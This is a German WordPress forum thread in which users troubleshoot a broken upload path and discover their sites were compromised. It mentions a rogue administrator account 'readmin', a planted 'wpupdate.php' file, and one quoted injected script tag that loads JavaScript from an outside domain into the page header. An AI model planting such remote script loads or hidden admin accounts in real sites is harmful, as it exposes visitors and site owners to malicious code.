kann plötzlich keine Bilder mehr hochladen

• Hallo, ich kann seit gestern keine Einzelbilder einbauen
    Genaueres:

• Ich verwende NextGEN. Wenn ich dort Bilder in einer Galerie anlege und hochlade, kann ich sie auf Seiten und Artikeln verwenden.
    • Wenn ich dagegen Bilder direkt vom Rechner laden will, wird >>>Die hochgeladene Datei konnte nicht nach /is/htdocs/wp1107712_XBHHG6Z4TD/www/wp-content/plugins verschoben werden<<< angezeigt. Im Forum taucht diese Meldung im Zusammenhang mit Schreibrechten auf, ich habe jedoch daran nichts geändert und wie gesagt, es funktionierte bereits.
    • Auch die Nutzung von bereits in der Mediathek vorhandenen Bildern klappt nicht, es gibt keine Vorschau angezeigt und im Artikel erscheinen die Bilder dann als fehlend ...
      Ist der Bildpfad /wp-content/plugins/2008/06/dateiname.jpg eigentlich richtig? "plugins"?

Vielleicht könnt ihr mir helfen?

• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

• Sollte eigentlich wp-content/uploads sein, außer Du hast es in den Einstellungen geändert. Schau mal unter Dashboard -> Einstellungen -> Verschiedenes, was dort bei Uploads in folgendem Ordner speichern eingetragen ist.

Desweiteren einen Blick werfen in: Dashboard -> Gallerie -> Optionen -> Allg. Optionen. Dort den Gallerie-Pfad überprüfen.

Einmal editiert, zuletzt von mfitzen (1. Dezember 2009 um 11:26)

• also ich habe gerade einen Benutzer "readmin" mit Adminrolle gelöscht, der eine Datei "wpupdate.php" unter Medien angelegt hat .... :confused:

• Sollte eigentlich wp-content/uploads sein, außer Du hast es in den Einstellungen geändert. Schau mal unter Dashboard -> Einstellungen -> Verschiedenes, was dort bei Uploads in folgendem Ordner speichern eingetragen ist.

Desweiteren einen Blick werfen in: Dashboard -> Gallerie -> Optionen -> Allg. Optionen. Dort den Gallerie-Pfad überprüfen.

da steht tatsächlich "wp-content/plugins" drin und unter Grundeinstellungen: "wp-content/uploads"

als Standard Galerie-Pfad ist "wp-content/gallery/" angegeben

• das mit dem standard-upload-Ordner wars. Geht jetzt wieder. Danke für den Hinweis!

Jetzt muss ich wohl "WP sicherer machen" lesen. Schade, ich muss eigentlich mit WP a_r_b_e_i_t_e_n .....

Wie bekomme ich heraus, das "readmin" nicht irgendwas auf dem Server installiert hat was da nicht sein soll?

• Hab auch seit Kurzem den User readmin unter den Admins! Nutze Wordpress 2.7.1 kann aber aufgrund von Kompatibilitätsproblemen mit wichtigen Plugins nicht updaten. Kann ich das Lecks selber schließen? Gibts weitere Infos/Tipps?

• Hab heute rein durch Zufall folgende Zeile im Header entdeckt - weil der Quellcode dadurch nicht mehr valide war:

Code
    <head><script type="text/javascript" src="http://top5result.com/promo/leftjs.js"></script></head>

Dazu war noch ein neuer Administrator namens "readmin" vorhanden.

Sonst sind mir noch keine weiteren Änderungen aufgefallen.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!